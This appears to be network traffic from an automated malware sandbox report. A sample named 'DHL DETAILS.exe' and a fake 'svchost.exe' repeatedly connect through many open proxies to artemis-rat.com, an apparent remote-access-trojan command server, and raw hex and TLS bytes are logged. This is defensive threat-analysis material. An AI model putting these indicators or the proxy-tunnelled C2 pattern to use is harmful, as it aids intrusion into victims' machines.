                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.662914038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.339292049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.364666939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.270770073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.022418022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.742494106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.548165083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1548192.168.2.554012188.136.164.14031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.667536020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.228095055 CET92INHTTP/1.0 200 Connection established
                                                                                    Proxy-agent: Kerio Control/9.4.2 patch 1 build 7290


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1549192.168.2.55444894.131.64.1575837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.667671919 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.20
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3661
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ezproxies.com
                                                                                    X-Cache-Lookup: NONE from ezproxies.com:58378
                                                                                    Via: 1.1 ezproxies.com (squid/3.5.20)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verd


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1550192.168.2.554733104.16.226.6806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.670407057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.824709892 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1551192.168.2.55470254.67.125.4531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.672847033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.848092079 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1552192.168.2.55467751.81.186.179514056352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.676743031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.177041054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.868525028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1553192.168.2.5546373.127.62.252806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.684804916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.993597984 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:19.994123936 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 9a a6 09 ce ef 60 f0 a1 ba 2e aa c4 ea 36 76 47 69 71 cf 3b 9c 19 b7 52 2a f7 e6 5b dc 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR`.6vGiq;R*[*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:20.298531055 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 a5 21 bf 3c c3 b0 e7 c5 93 82 8b d7 65 9a a2 aa b2 4f 21 b7 8c f5 2a 50 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9!<eO!*PDOWNGRD0000*H010Uartemis-rat.com0240309120940Z260309120940Z010Uartemis-rat.com0"0*H0A?J*:
                                                                                    Mar 9, 2024 13:14:20.527111053 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 fe 80 cb 63 6b 56 d4 35 5d 09 41 31 08 ae 48 f9 b6 f4 c6 63 68 dd 2e 15 37 a2 0a 16 38 64 e6 57 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 3c ea 23 d3 f0 65 66 41 00 b5 7f ec 60 db cb 15 f3 8d 7c a6 ac
                                                                                    Data Ascii: %! ckV5]A1Hch.78dW(<#efA`|+4#c
                                                                                    Mar 9, 2024 13:14:20.834781885 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 81 5c 8f 77 22 89 9d 15 8f bc f2 84 91 04 c2 93 72 4d f5 6f 9c ea 7a b0 92 68 93 56 1b cb 35 36 72 1c 57 b2 e5 2a b8 8f
                                                                                    Data Ascii: (\w"rMozhV56rW*


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1554192.168.2.554642114.156.77.10780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.697946072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1555192.168.2.554587119.23.148.173806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.701724052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1556192.168.2.55456782.137.244.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.701792955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1557192.168.2.554740192.154.246.9690006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.701839924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1558192.168.2.554763104.19.217.219806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.705218077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.861601114 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1559192.168.2.55452341.223.232.11731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.705218077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.600924969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.880280018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1560192.168.2.554764104.27.66.31806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.705374956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.861618042 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1561192.168.2.554765172.67.182.38806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.705379009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.861447096 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1562192.168.2.554754104.22.37.236806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.706326962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.862651110 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1563192.168.2.554771104.20.205.191806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.708209038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.864572048 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1564192.168.2.554774172.64.86.217806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.708292961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.864590883 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
